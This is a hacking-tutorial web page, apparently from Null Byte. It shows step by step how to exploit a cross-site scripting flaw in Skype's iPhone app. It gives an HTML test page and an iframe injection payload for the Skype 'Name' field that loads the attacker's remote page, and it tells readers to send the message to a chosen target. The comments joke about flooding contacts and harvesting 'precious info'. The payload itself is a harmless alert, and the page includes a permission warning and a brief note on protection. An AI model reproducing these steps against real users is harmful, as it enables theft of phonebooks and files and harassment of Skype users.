Like the recent XSS 0day exploit found in the Mac and Windows versions of Skype, a similar one has been found in the Skype app for iPhone. The vulnerability allows an attacker to send a message that contains malicious JavaScript code in the "Name" parameter. This code can steal your phonebook, crash the app, and potentially do a lot worse. The URI scheme is improperly identified for the web-kit browser. Instead of going to a blank browser page, it defaults to "file://". The code could steal any file on your phone that Skype could access. We can all see why this disaster-of-a-0day would want to be avoided, right?
In this Null Byte, I'm going to show you how the exploit works, and what you can do to prevent it!
Warning
- Only perform this on yourself, or users who give you their explicit permission.
Step 1 Making Your XSS Test Page
- Open a Text editor like "notepad" or your favorite IDE.
- The contents of the file should look like the following:
<html>
<head>
<script type="text/javascript">
function show_alert()
{
alert("XSS on Skype? WTFBBQ!");
}
</script>
</head>
<body onLoad="show_alert()" />
</body>
</html>
- Click File > Save as... Click "any type" for file type. Save the file to your Desktop as "index.html".
- Upload the file to a free webhost of your choice - I recommend 000webhost.
Step 2 Crafting Your XSS Message
- Open Skype on your computer.
- Open up your settings and edit your "Name" parameter.
- Enter the following as the "Name" contents:
"><iframe src="yoursite.000webhost.com">
- Select a target that is on Skype and send them a message.
When your target receives the message, Skype will execute the XSS attack, calling the commands contained inside your remote web page. Dangerous. Below, is that the test may look like.
Is There a Way to Protect Myself from This Attack?
The short answer is, no.
The only way an iPhone Skype user can protect themselves is to simply not use the app until this is patched. You could block everyone who is not on your contacts list, but you have to trust the friends you do have to not try this on you.
Skype claims that they will have this patched in the next release. From experience, I'm going to say that that it probably won't happen soon. The last exploit like this lead to days upon days of non-stop alert flooding to all of my Skype contacts. ;)
I hope this was an informative Null Byte. Comment below, or start a thread in the forum.
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
4 Comments
Hehe I remember that last one must have sucked for all my contacts on skype who were using windows or mac. I suspect this could be useful to an attacker who had set up a bunch of pay-per-view ads and needed hits, but I could be wrong ;)
The possibilities could be pretty crazy. I'm just not sure how far Skype has access, you could get tons of precious info :D.
Can you recommend another free webhost service cause T35 Hosting is no longer free. Thank you
http://www.000webhost.com/
Share Your Thoughts